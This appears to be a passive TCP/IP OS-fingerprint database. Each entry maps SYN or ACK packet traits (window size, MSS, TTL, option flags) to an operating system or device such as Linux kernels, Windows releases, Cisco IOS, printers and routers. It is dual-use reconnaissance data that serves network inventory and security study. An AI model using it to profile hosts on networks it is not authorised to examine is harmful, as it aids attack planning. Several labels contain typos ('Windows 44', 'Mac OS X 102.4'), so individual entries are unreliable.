0200:05B4:40:WS:0:0:0:0:S:2C:Linux 2.0.34-38 0200:05B4:40:WS:0:0:0:0:S:LT:Linux 2.0.36 0200:05B4:FF:WS:0:0:0:0:A:2C:Router 3Com 812 ADSL 0200:_MSS:40:WS:0:0:0:0:S:28:Windows XP 0200:_MSS:40:WS:0:0:1:0:A:28:ESESA TCP/IP Stack 0200:_MSS:80:00:0:0:0:0:A:LT:Linux 2.0.32-34 0200:_MSS:80:00:0:1:0:0:A:LT:Bay Networks BLN-2 Network Router or ASN Processor rev 9 0200:_MSS:80:00:0:1:0:1:A:LT:Bay Networks BLN-2 Network Router or ASN Processor rev 9 0200:_MSS:80:WS:0:0:0:0:A:LT:3COM / USR TotalSwitch Firmware: 02.02.00R 0212:_MSS:80:00:0:0:0:0:A:LT:Linux 2.0.32-34 0212:_MSS:80:00:0:1:1:0:A:LT:Solaris 2.6 - 2.7 0212:_MSS:80:00:0:1:1:1:A:LT:Solaris 2.6 - 2.7 0212:_MSS:80:WS:0:0:0:0:A:LT:CacheOS (CacheFlow 2000 proxy cache) 0212:_MSS:80:WS:0:0:1:0:A:LT:Linux 2.2.5 - 2.2.13 SMP 0212:_MSS:80:WS:0:1:0:0:A:LT:NetBSD 1.4 running on a SPARC IPX 0212:_MSS:80:WS:0:1:0:1:A:LT:NetBSD 1.4 running on a SPARC IPX 0212:_MSS:80:WS:0:1:1:0:A:LT:NetBSD 1.4 / Generic mac68k (Quadra 610) 0212:_MSS:80:WS:0:1:1:1:A:LT:NetBSD 1.4 / Generic mac68k (Quadra 610) 0218:0218:40:00:0:1:0:1:A:LT:NetBSD 0218:0218:40:WS:0:0:0:0:A:2C:Windows 98 0244:_MSS:80:WS:0:0:0:0:A:LT:Cyclades PathRouter/PC 03CA:_MSS:80:WS:0:0:0:0:A:LT:MPE/iX 5.5 03E0:0550:40:05:1:1:1:1:S:LT:Windows 2000 03E0:05B4:20:05:1:1:1:1:S:40:Windows 2000 server 03F2:_MSS:80:00:0:0:0:0:A:LT:Lexmark Optra S Printer 03F2:_MSS:80:WS:0:0:0:0:A:LT:Lexmark Optra S Printer 03F6:0218:FF:WS:0:0:0:0:A:2C:Lexmark Optra SC Printer 03F6:_MSS:80:WS:0:0:0:0:A:LT:Lexmark Optra S Printer 0400:0109:40:10:0:1:0:1:S:3C:Linux 0400:0200:FF:WS:0:0:0:0:A:2C:Zyxel Prestige 10 0400:0218:FF:WS:0:0:0:0:A:2C:3Com Superstack II 0400:0400:20:WS:0:0:0:0:A:2C:Windows 2000 0400:0400:40:00:1:1:0:1:A:3C:ElsaLanCom (SoHo ISDN Router) 0400:0400:80:WS:0:0:0:0:A:2C:Prime SharePH-1UNW (hardware printserver) 0400:0400:80:WS:0:0:0:0:S:2C:NCSA 2.3.07 0400:0500:80:WS:0:0:0:0:A:2C:ITC Version i7.13 of 02-07-99 (embedded device) 0400:0594:FF:WS:0:0:0:0:A:2C:3Com SuperStack 3 Switch 4400 0400:059C:FF:WS:0:0:0:0:A:18:3Com SuperStack 3300xm version 2.71 prom 1.00 0400:059C:FF:WS:0:0:0:0:A:2C:3Com SuperStack II 3300 0400:05A4:FF:WS:0:0:0:0:A:2C:3Com SuperStack II 3000 0400:05B4:40:00:0:1:0:1:S:3C:Windows 44 0400:05B4:40:WS:0:0:0:0:A:2C:FORE ES-2810 Switch 0400:05B4:FF:WS:0:0:0:0:A:2C:3Com 812 ADSL ROUTER 0400:05C8:20:WS:0:0:0:0:A:2C:Nortel BayStack Access Node 0400:0901:40:10:0:1:0:1:S:3C:Mac OS X 102.4 0400:_MSS:40:WS:0:0:0:0:S:28:Linux 2.4.18 0400:_MSS:80:00:0:1:0:0:A:LT:Bay Networks BLN-2 Network Router or ASN Processor rev 9 0400:_MSS:80:00:0:1:0:1:A:LT:Bay Networks BLN-2 Network Router or ASN Processor rev 9 0400:_MSS:80:WS:0:0:0:0:A:LT:3com Office Connect Router 810 0400:_MSS:80:WS:0:0:1:0:A:LT:Aironet 630-2400 V3.3P Wireless LAN bridge 0420:0114:40:00:1:1:1:1:A:3C:Linux 2.4.18-rc4 0424:_MSS:80:WS:0:0:0:0:A:LT:Intel InBusiness Print Station 0430:_MSS:80:WS:0:0:0:0:A:LT:PacketShaper 4000 v4.1.3b2 2000-04-05 052A:052A:40:00:1:1:0:1:A:3C:Debian Potato (2.2), Linux 2.2.20 0534:0534:80:WS:0:0:1:0:A:2C:Netware 0550:0550:40:WS:0:0:0:0:A:2C:Linux 2.4 0564:0564:40:00:1:1:1:1:A:3C:Linux kernel 2.4 0564:0564:40:WS:0:0:0:0:A:2C:Linux 0564:0564:40:WS:1:0:1:1:A:38:Linux 2.4 0564:0564:80:WS:1:1:1:0:A:LT:Windows 2000 0564:6405:40:00:0:1:1:1:A:3C:Solaris 0564:6405:40:WS:0:1:1:1:A:38:Mac OS 0578:0578:08:WS:0:0:0:0:A:2C:Minix 16-bit/Intel 2.0.3 0578:0578:40:WS:0:0:0:0:A:2C:CVP Telsey 0578:0578:40:WS:0:0:0:0:S:2C:Windows 2000 0578:_MSS:40:WS:0:0:0:0:A:28:Elsa Router 0578:_MSS:80:WS:0:0:0:0:A:LT:Minix 32-bit/Intel 2.0.0 0584:0584:80:00:1:1:1:1:A:3C:Red Hat Linux 8.0 (Psyche) 0584:0584:FF:00:0:1:1:1:A:3C:OpenBSD 05AC:0218:40:WS:0:0:0:0:A:2C:AXIS Printer 05B4:03E8:40:00:0:1:1:1:A:3C:Mac OS X 10.3.8 05B4:052A:40:00:0:1:0:1:A:3C:NetBSD 1.6.1 05B4:052A:40:00:1:1:0:1:A:3C:Debian Sarge, Linux 2.4.24-1 05B4:0564:40:01:0:1:1:1:A:3C:FreeBSD 5.1-RELEASE 05B4:0564:40:WS:1:1:0:0:A:30:Red Hat Linux 9.0 05B4:0564:80:WS:1:1:0:0:A:30:Windows 2000 05B4:05B4:20:WS:0:0:0:0:A:2C:Windows XP 05B4:05B4:40:00:0:1:0:1:S:3C:HP LaserJet 4550 Printer 05B4:05B4:40:00:0:1:1:1:A:3C:FreeBSD 05B4:05B4:40:00:1:1:1:1:A:3C:Red Hat Linux release 6.2 (Zoot) Kernel 2.2.14-5.0 05B4:05B4:40:00:1:1:1:1:A:40:SunOS 5.8 05B4:05B4:40:01:1:1:1:1:A:40:Solaris 8 05B4:05B4:40:WS:1:1:1:0:A:30:Windows 2000 Server 05B4:05B4:40:WS:1:1:1:0:S:30:Windows XP SP1 05B4:05B4:80:WS:0:0:0:0:A:2C:Zebra ZPL 05B4:05B4:80:WS:1:1:1:0:A:30:Windows 2000 Server 05B4:05B4:FF:00:1:1:1:1:A:40:Solaris 7 05B4:05B4:FF:WS:0:0:0:0:A:2C:FreeBSD/i386 05B4:B405:40:00:0:1:1:1:A:LT:Red Hat 7.1 (kernel 2.4.3) 05B4:B405:80:00:0:1:1:1:A:LT:Windows 2000 Server 05B4:_MSS:80:00:0:1:0:0:A:LT:HP JetDirect Card (J4169A) in an HP LaserJet 8150 05B4:_MSS:80:WS:0:0:0:0:A:LT:TOPS-20 Monitor 7(102540)-1,TD-1 05B4:_MSS:80:WS:0:1:1:0:A:LT:Network Appliance NetCache 5.1D4 05B4:_MSS:80:WS:0:1:1:1:A:LT:Network Appliance NetCache 5.1D4 05DC:0FD8:40:WS:0:0:0:0:A:2C:D-Link dsl604 wireless router 05DC:_MSS:80:WS:0:0:0:0:A:LT:Gandalf LanLine Router 05EA:05EA:20:WS:0:0:0:0:A:2C:Pocket pc 2003 0600:0300:20:WS:0:0:0:0:S:2C:Chase IOLAN Terminal Server v3.3.09 - TCP 0600:_MSS:80:WS:0:0:0:0:A:LT:Chase IOLAN Terminal Server v3.5.02 CDi 0640:05B4:40:WS:0:0:0:0:A:2C:APC MasterSwitch Network Power Controller 0640:_MSS:80:WS:0:0:0:0:A:LT:APC MasterSwitch Network Power Controller 0648:0218:40:WS:0:0:0:0:A:2C:HP Printer 0648:_MSS:80:WS:0:0:0:0:A:LT:FastComm FRAD F9200-DS-DNI -- Ver. 4.2.3A 06C2:_MSS:80:WS:0:0:0:0:A:LT:Cyclades PathRAS Remote Access Server v1.1.8 - 1.3.12 0700:_MSS:80:00:0:0:0:0:A:LT:Lantronix ETS16P Version V3.5/2(970721) 0700:_MSS:80:WS:0:0:0:0:A:LT:Lantronix ETS16P Version V3.5/2(970721) 073F:_MSS:80:00:0:0:0:0:A:LT:Novell NetWare 3.12 or 386 TCP/IP 073F:_MSS:80:WS:0:0:0:0:A:LT:CLIX R3.1 Vr.7.6.20 6480 07D0:_MSS:80:00:0:0:1:0:A:LT:Novell NetWare 3.12 - 5.00 07D0:_MSS:80:WS:0:0:1:0:A:LT:Novell NetWare 3.12 - 5.00 0800:0109:40:10:0:1:0:1:S:3C:Linux 0800:0200:FF:WS:0:0:0:0:A:2C:Cisco 0800:0578:FF:WS:0:0:0:0:A:2C:NetGear Hardware Router 0800:_MSS:40:WS:0:0:0:0:A:28:Connexa 0800:_MSS:40:WS:0:0:0:0:S:28:Window 2000 SP3 0800:_MSS:80:00:0:0:0:0:A:LT:KA9Q 0800:_MSS:80:00:0:0:0:1:A:LT:KA9Q 0800:_MSS:80:WS:0:0:0:0:A:LT:3Com Access Builder 4000 7.2 0800:_MSS:80:WS:0:0:1:0:A:LT:HP Procurve Routing Switch 9304M 0808:_MSS:80:WS:0:0:0:0:A:LT:Siemens HICOM 300 Phone switch (WAML LAN card) 0834:0578:FF:WS:0:0:0:0:A:2C:BeWan 2.3.6 0834:7805:FF:WS:0:0:0:0:A:2C:Vigor 2900G 0848:_MSS:80:WS:0:0:0:0:A:LT:Intergraph Workstation (2000 Series) running CLiX R3.1 0860:0218:40:00:1:1:1:0:S:30:Windows 9x 0860:0218:40:00:1:1:1:0:S:3C:Windows 9x 0860:0218:40:00:1:1:1:0:S:LT:Windows 9x 0860:0218:40:WS:0:0:0:0:A:2C:Windows 98 0860:0218:80:WS:0:0:1:0:A:2C:Windows 98 0860:0218:FF:WS:0:0:0:0:S:LT:Cisco IGS 3000 IOS 11.x(16), 2500 IOS 11.2(3)P 0860:05B4:40:WS:0:0:1:0:A:2C:Windows 98 0860:05B4:40:WS:1:1:1:0:S:30:Windows 98 0860:05B4:80:00:0:1:1:1:A:3C:Windows ME 0860:05B4:FF:WS:0:0:0:0:A:LT:IOS Version 10.3(15) - 11.1(20) 0860:_MSS:80:00:0:0:0:0:A:LT:HP JetDirect Firmware Rev. H.06.00 0860:_MSS:80:00:0:1:1:0:A:LT:Windows NT4 / Win95 / Win98 0860:_MSS:80:00:0:1:1:1:A:LT:Windows NT4 / Win95 / Win98 0860:_MSS:80:WS:0:0:0:0:A:LT:Chase IOLan Terminal Server 09C8:02F8:FF:WS:0:0:0:0:A:2C:Windows 0A28:_MSS:80:WS:0:0:0:0:A:LT:Apple Color LaserWrite 600 Printer 0AF0:0578:80:WS:1:1:1:0:A:30:Windows 2000 0B18:058C:40:WS:0:0:0:0:S:2C:HNC 91849 0B63:_MSS:80:00:0:1:1:0:A:LT:Linux 2.1.19 - 2.2.17 0B63:_MSS:80:00:0:1:1:1:A:LT:Linux 2.1.19 - 2.2.17 0B68:05B4:40:00:1:1:1:1:S:3C:Linux 2.4.21 0B68:05B4:40:WS:0:0:0:0:A:2C:DLink DP-300 Printserver 0B68:05B4:40:WS:1:1:1:0:A:30:Linux 2.2.19 0B68:05B4:FF:WS:1:1:1:0:A:LT:Lexmark T520 Network Printer 0B68:_MSS:40:WS:0:0:1:0:A:LT:Linux 2.0.32 - 2.0.34 0B68:_MSS:80:00:0:1:1:0:A:LT:Sun Solaris 8 early acces beta through actual release 0B68:_MSS:80:00:0:1:1:1:A:LT:Sun Solaris 8 early acces beta through actual release 0B68:_MSS:80:WS:0:0:0:0:A:LT:D-Link Print Server 0BB8:05B0:20:WS:0:0:0:0:A:2C:VMS/VAX 5.5 0BB8:_MSS:80:00:0:1:0:0:A:LT:OpenVMS 7.1 Alpha running Digital's UCX v4.1ECO2 0C00:0109:40:10:0:1:0:1:S:3C:Linux Mandrake 9.1 0C00:052A:40:WS:0:0:0:0:A:2C:NetGear Router 0C00:05A0:40:WS:0:0:0:0:A:2C:Trendnet TEW 431 BRP 0C00:05B4:FF:00:0:1:0:0:A:30:OKI 0C00:05B4:FF:WS:0:0:0:0:A:2C:OKI 0C00:_MSS:40:WS:0:0:0:0:S:28:Slackware 8.0 0C00:_MSS:40:WS:0:0:0:0:S:LT:Linux Slakware 8.0 0C00:_MSS:80:WS:0:0:0:0:A:LT:Canon photocopier/fax/scanner/printer GP30F 0C1C:05B4:FF:WS:0:0:0:0:A:2C:Nokia M1122 Adsl Router 0C90:0218:40:WS:0:0:0:0:A:2C:HP Printer 0C90:05B4:40:00:1:1:1:0:S:34:Windows 0C90:05B4:40:WS:1:1:1:0:S:30:Windows XP 0C90:_MSS:80:WS:0:0:0:0:A:LT:HP JetDirect Print Server 0E00:_MSS:80:WS:0:0:0:0:A:LT:Lantronix EPS1 Version V3.5/1(970325) 0ED0:03C0:40:00:1:1:1:1:A:3C:linux 0F87:_MSS:80:00:0:0:0:0:A:LT:Novell NetWare 3.12 or 386 TCP/IP 0F87:_MSS:80:WS:0:0:0:0:A:LT:A/UX 3.1.1 SVR2 or OpenStep 4.2 0F87:_MSS:80:WS:0:0:1:0:A:LT:AIX 4.3 0FA0:_MSS:80:WS:0:0:0:0:A:LT:MultiTech CommPlete (modem server) RAScard 0FFF:0400:20:WS:0:0:0:0:A:2C:ASMAX Broadband router 1000:0002:40:WS:0:0:0:0:A:2C:Alcatel Modem 1000:0004:FF:WS:0:0:0:0:A:2C:Cisco PIX 1000:0109:40:10:0:1:0:1:S:LT:FreeBSD 4.5 1000:0200:40:00:0:1:0:1:A:3C:Alcatel Router ADSL Speed Touch Pro 1000:0200:40:WS:0:0:0:0:A:2C:Alcatel Speedtouch Pro ADSL modem 1000:0200:40:WS:0:0:0:0:S:LT:CISCO IOS 1000:0200:FF:WS:0:0:0:0:A:2C:Alcatel Speed Touch Home/Pro 1000:0400:1E:F5:0:0:0:0:S:LT:Alcatel (Xylan) OmniStack 5024 v3.4.5 1000:0400:1E:WS:0:0:0:0:S:LT:Chorus MiX V.3.2 r4.1.5 COMP-386 1000:0400:20:F5:0:0:0:0:S:LT:Alcatel (Xylan) OmniStack 5024 1000:0400:20:WS:0:0:0:0:A:2C:Alcatel LSS 210-Stack Version 3.4.8 1000:0400:40:WS:0:0:0:0:A:2C:HP J2603A Ethernet SNMP Module 1000:0400:40:WS:0:0:0:0:S:2C:Trumpet TCP 2.01 / DOS 1000:05AC:FF:WS:0:0:0:0:A:2C:QMS4060 1000:05B0:80:00:0:1:0:0:S:30:VMS 1000:05B4:10:WS:0:0:0:0:A:2C:Extreme Gigabit switch 1000:05B4:20:WS:0:0:0:0:A:2C:StorageWorks SAN switch (FabricOS v2.1.7) 1000:05B4:40:WS:0:0:0:0:A:18:DWL1000 802.11b Access Pointrt.com 1000:05B4:40:WS:0:0:0:0:A:2C:iPath Cable Media Access Hub 1000:05B4:40:WS:0:0:0:0:S:2C:Solaris 1000:05B4:FF:WS:0:0:0:0:A:2C:Cisco Pix 515 1000:0901:40:10:0:1:0:1:S:LT:Mac os X 10.1 1000:AC05:40:WS:0:0:0:0:A:2C:HP Procurve Switch 1000:_MSS:20:WS:0:0:0:0:A:28:Motorola SurfBoard SB4100 CableModem 1000:_MSS:20:WS:0:0:0:0:S:28:Linux RedHat 9 (kernel 2.4.20) 1000:_MSS:40:WS:0:0:0:0:A:LT:SCO UnixWare 2.1.2 1000:_MSS:40:WS:0:0:0:0:S:28:SunOS 4.1.4 1000:_MSS:40:WS:0:0:0:0:S:LT:Linux 1000:_MSS:80:00:0:0:1:0:A:LT:OpenVMS/Alpha 7.1 using Process Software's TCPWare V5.3-4 1000:_MSS:80:00:0:1:0:0:A:LT:Alcatel 1000 ADSL (modem) 1000:_MSS:80:00:0:1:0:1:A:LT:Alcatel 1000 ADSL (modem) 1000:_MSS:80:WS:0:0:0:0:A:28:Aironet AP4800E v8.07 11 Mbps wireless access poinit 1000:_MSS:80:WS:0:0:1:0:A:LT:VirtualAccess LinxpeedPro 120 running Software 7.4.33CM 1020:0218:FF:WS:0:0:0:0:A:2C:Cisco 2600 IOS 12.0 1020:0218:FF:WS:0:0:0:0:S:2C:Cisco 3660 IOS 12.2(x) 1020:022C:FF:00:0:0:0:0:S:LT:Cisco 1750 IOS 12.0(5), Cisco 2500 IOS 11.3(1) 1020:022C:FF:WS:0:0:0:0:A:2C:Cisco IOS 12.0(5) 1020:0564:FF:WS:0:0:0:0:A:2C:IOS (tm) C2600 Software (C2600-IS-M), Version 12.2(8)T4,R 1020:05B4:FF:WS:0:0:0:0:A:2C:Cisco IOS 12.1.5-12.2.13a 1020:05B4:FF:WS:0:0:0:0:S:LT:Cisco 2611 IOS 11.3(2)XA4 1020:6405:FF:WS:0:0:0:0:A:2C:Cisco IOS 1020:B405:FF:WS:0:0:0:0:A:2C:AIRONET1200 1020:_MSS:80:WS:0:0:0:0:A:LT:AS5200 1020:_MSS:FF:WS:0:0:1:0:A:LT:Cisco IOS 10A4:058C:FF:00:1:1:1:1:A:40:Windows Server 2003 10C0:0218:80:WS:1:1:1:0:S:30:Windows 2000 Advanced Server SP2 10C0:0218:FF:WS:0:0:0:0:A:2C:Cisco IOS 10C0:0218:FF:WS:0:0:0:0:S:LT:Cisco 1600 IOS 11.2(15)P 10C0:055E:80:WS:1:1:1:0:S:30:Windows 98 10C0:05B4:40:00:1:1:1:1:S:40:Windows XP 10C0:05B4:80:WS:1:1:1:0:S:30:Windows NT SP3 10C0:05B4:FF:WS:0:0:0:0:A:2C:Cisco IOS 11.2 10C0:05B4:FF:WS:0:0:0:0:S:LT:Cisco 3620 IOS 11.2(17)P 10C0:_MSS:80:WS:0:0:0:0:A:LT:Cisco 1600/3640/7513 Router (IOS 11.2(14)P) 111C:0218:40:WS:0:0:0:0:A:2C:Ascend MAX 1800 111C:05B4:20:WS:0:0:0:0:A:2C:Linksys PSUS4 Printserver 111C:05B4:40:WS:0:0:0:0:A:2C:OpenVMS 111C:05B4:40:WS:0:0:1:0:A:2C:Ascend MAX6000 111C:05B4:40:WS:0:0:1:0:A:LT:SCO Openserver 502 111C:_MSS:80:WS:0:0:0:0:A:LT:Ascend/Lucent Max (HP,4000-6000) version 6.1.3 - 7.0.2+ 111C:_MSS:80:WS:0:0:1:0:A:LT:Apple LaserWriter 16/600 PS, HP 6P, or HP 5 Printer 1140:05CC:40:00:1:1:1:1:A:3C:Linux 2.4.8 1146:05C2:40:00:1:1:1:1:S:3C:Debian 3.0 woody (2.4.18) 1164:05B4:40:01:1:1:1:1:S:3C:Fedora Red Hat 1234:_MSS:FF:WS:0:0:0:0:S:28:Knoppix based L.A.S 12CC:0650:40:00:1:1:1:1:A:3C:Debian Woody 12D8:1802:FF:WS:0:0:0:0:S:2C:Palm OS 1490:0524:40:00:1:1:1:1:S:3C:Linux Suse 8.1 14B8:052E:40:00:1:1:1:1:S:3C:Linux RedHat 7 14F0:0218:80:WS:1:1:1:0:A:LT:Windows 2000 Professional 14F0:05B4:80:WS:1:1:1:0:S:LT:Windows ME 1520:0548:40:00:1:1:1:1:S:3C:Linux Red Hat 1540:0550:40:00:1:1:1:1:S:3C:Linux 1540:0550:40:WS:0:0:1:0:A:2C:Linux RedHat - 2.4.18 1540:0550:40:WS:1:1:1:0:A:30:Linux 2.4.x 1590:0564:40:00:1:1:1:1:S:3C:Debian Woody (Kernelversion 2.4.18) 159F:05B4:40:00:0:1:1:0:S:3C:FreeBSD 2.2.1 - 4.1 15B8:057A:40:00:1:1:1:1:A:3C:Linux 2.4.10 15E0:0584:40:00:0:1:1:1:A:3C:Linux 2.4.20 1608:0582:40:WS:1:1:1:0:A:30:Linux 1610:0584:40:00:1:1:1:1:S:3C:Linux 2.4.20 1618:0578:40:00:1:1:1:1:S:3C:Linux 2.4.13 1640:0590:40:00:1:1:1:1:S:3C:Linux 2.4.23 165C:_MSS:80:WS:0:0:1:0:A:LT:SCO Release 5 1678:05AA:40:00:1:1:1:1:A:3C:Linux 2.6.1 1680:0584:40:00:1:1:1:1:A:3C:Linux 2.4.18 2.4.19 1680:05AC:40:00:1:1:1:1:A:3C:Linux 2.4.20 (X86) 1680:_MSS:80:00:0:1:1:1:A:LT:Linux 2.4.7 (X86) 16A0:01F4:40:00:1:1:1:1:A:3C:Linux 16A0:0564:40:00:0:1:1:1:A:3C:Linux 2.6.x 16A0:0564:40:00:1:1:0:1:A:3C:Linux Redhat 7.2 (Enigma) - Linux 16A0:0564:40:00:1:1:1:1:A:3C:Linux 2.4.xx 16A0:0564:40:WS:0:1:1:1:A:38:Linux 16A0:0564:40:WS:1:0:1:1:A:38:Linux 2.4.21 16A0:0578:40:00:1:1:1:1:A:3C:Linux 2.4.7 16A0:057A:40:00:1:1:1:1:A:3C:Debian Linux 16A0:057A:40:02:1:1:1:1:A:3C:Debian GNU/Linux 16A0:0584:40:00:1:1:1:1:A:3C:Linux 16A0:0586:40:00:1:1:1:1:A:3C:Linux 16A0:059C:40:00:1:1:1:1:A:3C:Linux fw 2.4.7-10 16A0:05AC:20:00:1:1:1:1:A:3C:Linux 16A0:05AC:40:00:0:1:1:1:A:3C:Linux 2.4.20 RedHat 9 16A0:05AC:40:00:1:1:0:1:A:3C:Linux 16A0:05AC:40:00:1:1:1:1:A:3C:Linux 2.4.18-686 (Debia GNU/Linux) 16A0:05AC:80:00:1:1:1:1:A:3C:Linux 2.4.12 16A0:05AC:FF:00:1:1:1:1:A:3C:Linux 2.4.12 16A0:05B4:40:00:0:1:1:1:A:3C:Linux 2.4.4-4GB 16A0:05B4:40:00:1:1:0:1:A:3C:Windows XP 16A0:05B4:40:00:1:1:1:0:A:LT:Linux 2.4.2 16A0:05B4:40:00:1:1:1:1:A:3C:Linux 2.4.xx 16A0:05B4:40:01:1:1:1:1:A:LT:Linux Kernel 2.4.17 (with MOSIX patch) 16A0:05B4:40:02:1:1:1:1:A:3C:Linux 2.6.9 - 2.6.11 16A0:05B4:40:03:1:1:0:1:A:3C:Linux Kernel 2.4.xx 16A0:05B4:40:07:1:1:1:1:A:3C:Linux.2.4.20-web100 16A0:05B4:40:WS:0:1:1:1:A:38:Windows 16A0:05B4:40:WS:1:0:1:1:A:38:Linux 16A0:05B4:80:00:0:1:1:0:A:3C:Linux Kernel 2.4.xx 16A0:05B4:80:00:0:1:1:1:A:3C:Linux Kernel 2.4.xx 16A0:05B4:80:00:1:1:1:1:A:3C:Linux Kernel 2.4.12 16A0:05B4:FF:00:1:1:0:1:A:3C:Linux Kernel 2.4.18 16A0:05B4:FF:00:1:1:1:1:A:3C:Linux 2.4.12 16A0:2A05:40:00:1:1:0:1:A:3C:Linux 2.4.22 16A0:5C05:40:00:0:1:1:1:A:3C:Linux 2.4.19 Knoppix 16A0:6405:40:02:0:1:1:1:A:3C:RedHat Enterprise 3.0 ES 16A0:6405:40:02:1:1:1:1:A:3C:Linux 2.6.9-1 16A0:7A05:40:00:0:1:1:1:A:3C:Redhat Linux 16A0:7E05:40:00:0:1:1:1:A:3C:linux debian 16A0:8C05:40:00:0:1:1:1:A:3C:Linux RedHat 9 16A0:B405:40:00:0:1:1:1:A:3C:Linux version 2.4.2-2 (Red Hat Linux 7.1) 16A0:B405:40:00:0:1:1:1:A:LT:Linux Kernel 2.4.24 (ppc) 16A0:B405:40:00:1:1:1:1:A:3C:Linux Debian Unstable 2.4.26 16A8:05AA:40:WS:1:1:1:0:A:30:Debian GNU/Linux (unstable) - 2.4.xx Series Kernel 16B0:051E:40:WS:1:1:1:0:A:30:Linux 2.4.19 16B0:0584:40:00:1:1:1:1:S:3C:Linux 2.2.x 16B0:0584:40:WS:0:0:1:0:A:2C:Slackware 8.0 Linux 2.2.20 16B0:0584:40:WS:1:1:1:0:A:30:Redhat 7.0 (linux 2.2.16) 16B0:05AC:40:00:1:1:1:0:S:3C:Linux 2.4.10 16B0:05AC:40:00:1:1:1:1:S:3C:Linux 2.4.18-6mdk 16B0:05AC:40:02:1:1:1:1:S:3C:Linux Ubuntu 5.04 Hoary 16B0:05AC:40:6F:1:1:1:0:S:3C:Linux 2.4.10 16D0:0218:80:00:1:1:1:0:S:30:Windows 95 16D0:0218:80:WS:1:1:1:0:A:30:Windows 2000 16D0:052A:40:00:1:1:0:1:S:3C:Linux 2.4.23 16D0:0546:40:WS:1:1:1:0:A:30:Linux 2.4.19 16D0:0550:80:WS:1:1:1:0:S:30:Windows XP 16D0:055C:40:00:1:1:1:1:S:3C:Linux 2.6.7-gentoo-r7 16D0:055C:40:WS:0:0:1:0:A:2C:Debian Sar 16D0:0564:40:00:0:1:1:0:A:30:Phlak 0.2 16D0:0564:40:00:1:1:1:0:A:34:Linux 2.4.2 16D0:0564:40:00:1:1:1:1:S:3C:Linux RedHat 16D0:0564:40:WS:0:0:1:0:A:2C:Linux 2.4 16D0:0564:40:WS:1:1:1:0:A:30:Linux 2.4.19 16D0:0564:40:WS:1:1:1:1:S:3C:Slackware Linux 8.1 16D0:0584:40:00:1:1:1:1:S:3C:Linux 2.4.8 16D0:0584:40:02:1:1:1:1:S:3C:MANDRAKE 10.1 16D0:0584:40:WS:0:0:1:0:A:2C:Linux 2.4.18 16D0:0584:40:WS:1:1:1:0:A:30:Linux 2.4.17 16D0:0584:80:WS:0:0:1:0:A:2C:RedHat Linux 16D0:0594:40:WS:0:0:0:0:A:2C:Linux 16D0:0598:40:WS:0:0:1:0:A:2C:Linux 16D0:0598:40:WS:1:1:0:0:A:30:Linux 16D0:0598:40:WS:1:1:1:0:A:30:WindowsXP Sp2 16D0:059C:40:00:1:1:1:1:S:3C:fedora core 16D0:059C:40:WS:1:1:1:0:A:30:Red Hat Linux 16D0:05AC:40:00:1:1:1:1:S:3C:Debian - Linux 2.4.18 16D0:05AC:40:WS:0:0:1:0:A:2C:Linux 2.4.xx 16D0:05AC:40:WS:1:1:0:0:A:30:Windows .NET 16D0:05AC:40:WS:1:1:1:0:A:30:Linux 2.4.18-3 (IServ/RedHat) 16D0:05B4:01:WS:1:1:1:0:A:30:Linux 16D0:05B4:20:00:1:1:1:1:S:3C:Linux 2.4.20 16D0:05B4:20:00:1:1:1:1:S:LT:Linux 2.4.10-GR Security Patch 1.8.1 16D0:05B4:40:00:0:1:0:0:A:30:Slackware 2.4.17 16D0:05B4:40:00:0:1:0:1:A:3C:HP psc 2500 network Printer 16D0:05B4:40:00:0:1:1:0:A:30:Linux Slackware 8 - kernel 2.4.17 16D0:05B4:40:00:0:1:1:0:S:30:Mandrake 8.2 16D0:05B4:40:00:0:1:1:0:S:3C:Linux 2.4.13-ac7 16D0:05B4:40:00:0:1:1:1:S:3C:Linux 2.4.19-pre10-ac2 16D0:05B4:40:00:1:1:0:0:S:34:Linux 2.4.xx 16D0:05B4:40:00:1:1:0:1:S:3C:Linux 2.6.0 16D0:05B4:40:00:1:1:1:0:A:34:Linux 2.4.xx 16D0:05B4:40:00:1:1:1:0:S:30:Linux 2.4.1-14 16D0:05B4:40:00:1:1:1:0:S:34:Linux 2.4.23-grsec 16D0:05B4:40:00:1:1:1:0:S:34:Linux Debian Woody 16D0:05B4:40:00:1:1:1:0:S:3C:Linux 2.4.xx 16D0:05B4:40:00:1:1:1:1:S:3C:Linux 2.4.xx 16D0:05B4:40:01:1:1:1:1:S:3C:Linux 2.4.10 - 2.4.16 16D0:05B4:40:01:1:1:1:1:S:LT:Linux Red Hat 9 16D0:05B4:40:02:1:1:1:1:S:3C:Linux 2.6.9 - 2.6.10 16D0:05B4:40:03:1:1:1:0:A:34:Windows 16D0:05B4:40:07:1:1:1:1:S:3C:Debian Linux 16D0:05B4:40:07:1:1:1:1:S:3C:Linux Fedora Core 2 2.6.8-1.521 16D0:05B4:40:WS:0:0:0:0:A:2C:HP LaserJet 2100 Series 16D0:05B4:40:WS:0:0:0:0:A:LT:Intel PRO/Wireless LAN Acess Point Version 02.00-04 16D0:05B4:40:WS:0:0:0:0:S:2C:Linux 16D0:05B4:40:WS:0:0:1:0:A:2C:Linux 2.4.xx 16D0:05B4:40:WS:0:0:1:0:A:LT:Linux 16D0:05B4:40:WS:0:0:1:0:A:LT:Linux 16D0:05B4:40:WS:0:0:1:0:S:2C:Linux 2.4.18 16D0:05B4:40:WS:0:1:1:1:S:38:SuSE Linux 8.0 Kernel 2.4.18-4GB (i686) 16D0:05B4:40:WS:1:1:0:0:A:30:Linux 16D0:05B4:40:WS:1:1:1:0:A:1C:Linux 2.4.22-gentoo-r5 16D0:05B4:40:WS:1:1:1:0:A:30:Linux 2.4.xx 16D0:05B4:40:WS:1:1:1:0:A:30:Linux 2.6.9 - 2.6.10 16D0:05B4:40:WS:1:1:1:0:A:30:Linux Fedora Core 1 16D0:05B4:40:WS:1:1:1:0:A:30:Mandrake 9.2 (Linux 2.4.xx) 16D0:05B4:80:00:1:1:1:1:S:3C:Linux 2.4.14 - 2.4.22 16D0:05B4:80:WS:0:0:0:0:A:2C:Linux 16D0:05B4:80:WS:0:0:1:0:A:2C:Windows XP / 2000 16D0:05B4:80:WS:0:0:1:0:S:2C:FreeBSD 16D0:05B4:80:WS:1:1:0:0:A:30:Linux 16D0:05B4:80:WS:1:1:1:0:A:30:Windows 95 16D0:05B4:80:WS:1:1:1:0:S:30:Windows 95 16D0:05B4:80:WS:1:1:1:0:S:LT:Windows 98 / 2000 16D0:05B4:FF:00:1:1:1:1:S:3C:Slackware Linux 16D0:05B4:FF:WS:0:0:0:0:A:2C:Linksys BEFSR11 1 Port Router/HUB 16D0:05B4:FF:WS:0:0:1:0:S:2C:Linux 2.4 